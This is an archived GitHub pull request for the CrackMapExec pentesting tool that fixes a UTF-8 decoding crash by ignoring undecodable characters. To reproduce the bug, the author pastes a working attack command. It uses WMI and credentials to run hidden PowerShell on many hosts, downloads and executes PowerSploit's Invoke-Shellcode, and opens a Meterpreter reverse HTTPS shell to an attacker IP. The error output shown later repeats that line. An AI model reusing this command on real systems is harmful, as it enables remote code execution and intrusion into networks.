This repository has been archived by the owner on Dec 6, 2023. It is now read-only.
replaced ".decode('utf8')" with "unicode(x, errors='ignore')" #16
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Was running the cmd:
./crackmapexec.py -t 25 some-ips.txt --execm wmi -u user -p password -x "cmd.exe /c powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost MY-IP -Lport 443 -Force"
After all the fail/success messages at logging in, it tried to display the output of running the powershell command but failed:
The offending code:
And:
The variable result is just the powershell error message but it contains the character \x83 for some reason which apparently is not utf8 decodeable.
"Invoke-Shellcode : A positional parameter cannot be found that accepts argument\r\n '\x83??Payload'.\r\nAt line:1 char:171\r\n+ IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.\r\ncom/mattifestation/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); In\r\nvoke-Shellcode <<<< \x83??Payload windows/meterpreter/reverse_https \x83??Lhost IP\r\nIP \x83??Lport 443 \x83??Force\r\n + CategoryInfo : InvalidArgument: (:) [Invoke-Shellcode], Paramet \r\n erBindingException\r\n + FullyQualifiedErrorId : PositionalParameterNotFound,Invoke-Shellcode\r\n \r\n"
So I googled the unicode error and it lead me to: http://stackoverflow.com/questions/12468179/unicodedecodeerror-utf8-codec-cant-decode-byte-0x9c and I replaced all x.decode('utf8') with unicode(x, errors='ignore') and that seemed to fix the problem as it'll still print everything it can, it'll just ignore any nonunicode characters.